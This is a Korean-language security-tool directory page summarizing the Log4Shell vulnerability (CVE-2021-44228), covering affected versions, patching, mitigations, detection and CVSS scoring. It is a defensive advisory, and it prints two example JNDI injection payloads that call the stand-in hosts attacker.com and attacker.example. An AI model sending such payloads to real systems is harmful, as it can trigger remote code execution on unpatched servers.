Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationThreat IntelligenceLearning & EducationCurated Resources
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2021-44228 — “Log4Shell”

ChatGPT 이미지 (2026년 6월 14일, 오후 02:56:45)

Severity CVSS Type Date

Apache Log4j 2의 치명적인 원격 코드 실행 취약점으로, Log4Shell로 널리 알려져 있습니다.


📖 목차

  • 개요
  • 기술적 세부사항
  • 심각도 및 CVSS
  • 영향을 받는 버전
  • 익스플로잇 및 영향
  • 실제 영향
  • 탐지
  • 완화 및 수정
  • 요약

🔎 개요

CVE-2021-44228은 Apache Log4j 2 버전 2.x (2.15.0 이전)에서 2021년 12월에 발견된 치명적인 RCE 취약점입니다.

인증되지 않은 원격 공격자가 특수하게 조작된 입력을 Log4j가 기록하도록 하여 취약한 시스템에서 임의의 코드를 실행할 수 있습니다. 이 결함은 전 세계적으로 수많은 Java 기반 애플리케이션과 서비스에 영향을 미칩니다.


🧠 기술적 세부사항

이 취약점은 Log4j가 기록된 문자열에서 JNDI 조회를 처리하는 방식에서 발생합니다. 공격자는 기록된 메시지에 악의적인 JNDI 리소스(예: LDAP, DNS)를 포함시킬 수 있습니다. 예:

root@kitploit:~

${jndi:ldap://attacker.com/a}

Log4j는 다음 단계를 수행합니다:

  1. 입력에서 JNDI 조회를 파싱합니다.
  2. 공격자가 제어하는 서버로 원격 조회를 수행합니다.
  3. 조회 과정의 일부로 악성 Java 코드를 로드합니다.
  4. 취약한 애플리케이션 컨텍스트 내에서 해당 코드를 실행합니다.

이를 통해 공격자는 영향을 받는 서비스에서 완전한 **원격 코드 실행(RCE)**을 달성할 수 있습니다.


📊 심각도 및 CVSS

Log4j는 수많은 라이브러리와 애플리케이션에서 사용되므로, 신뢰할 수 없는 데이터를 기록하는 모든 시스템이 취약할 수 있습니다.


📦 영향을 받는 버전

다음 Log4j 2 버전이 취약합니다:

root@kitploit:~

>= 2.0-beta9 및 < 2.15.0

또한 2.15.0의 일부 구성은 여전히 익스플로잇 가능했으므로, 2.16.0 이상이 안전 기준입니다.


🛠 수정 및 해결 방법

✅ 공식 수정 버전

Log4j 2 버전으로 업데이트하세요:

root@kitploit:~

2.17.1 이상

이후 패치(예: 2.17.2, 2.19.0 등)에서 추가로 안전성이 개선되었습니다.


🧱 임시 완화 조치 (즉시 패치가 불가능한 경우)

즉시 업그레이드가 불가능하다면 다음을 수행할 수 있습니다:

  • Log4j 구성에서 JNDI 조회 비활성화
  • 다음 설정:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • 클래스패스에서 JndiLookup 클래스 제거:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

이러한 단계는 업데이트할 때까지 노출을 줄이는 데 도움이 됩니다.


🔥 익스플로잇 및 영향

nessus3 nessus4 nessus5

이 취약점은 익스플로잇하기 매우 쉽습니다. 공격자는 HTTP 헤더, 양식 매개변수, 채팅 메시지, 데이터베이스 필드 등을 통해 조작된 문자열을 전송하기만 하면 됩니다. 해당 문자열이 애플리케이션에 의해 기록되면:

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

기록되면 애플리케이션은 원격 조회를 수행하고 공격자가 제어하는 Java 코드를 실행하도록 강제될 수 있습니다.


🌍 실제 영향

Log4Shell은 전 세계적으로 엄청난 영향을 미쳤습니다:

  • 셀 수 없이 많은 공개 서비스가 즉시 노출되었습니다.
  • 클라우드 제공업체, 게임 서버, 엔터프라이즈 앱, IoT, 웹 서비스, API 등이 영향을 받았습니다.
  • 전체 보안 커뮤니티가 취약한 시스템을 탐지하고 패치하기 위해 움직였습니다.
  • 익스플로잇이 광범위하고 자동화되었으며 빠르게 확산되었습니다.

이것은 수십 년 만에 가장 중요한 취약점 중 하나입니다.


🧪 탐지

취약한 시스템은 다음 방법으로 탐지할 수 있습니다:

  • 로그에서 의심스러운 JNDI 패턴(${jndi:) 스캔
  • Log4j 버전을 확인하는 취약점 스캐너 사용
  • 익스플로잇 시도에 대한 수신 트래픽 모니터링
  • JNDI 조회 지원 여부에 대한 클래스패스 내용 확인

📌 요약


⚠️ 최종 권고

애플리케이션이나 사용 중인 라이브러리가 Log4j 2.x에 의존한다면, 즉시 패치된 버전(≥ 2.17.1)으로 업데이트하고 JNDI 조회가 비활성화 또는 제거되었는지 확인하십시오.

도구 다운로드
메트릭세부 정보
CVSS v3.1 기본 점수10.0 (치명적)
공격 벡터네트워크
필요 권한없음
사용자 상호작용없음
인증필요 없음
영향전체 RCE
필드값
CVE IDCVE-2021-44228
별칭Log4Shell
제품Apache Log4j 2
심각도치명적 (CVSS 10.0)
유형원격 코드 실행
영향전체 시스템 손상
익스플로잇 용이성매우 쉬움
완화 방법2.17.1 이상으로 패치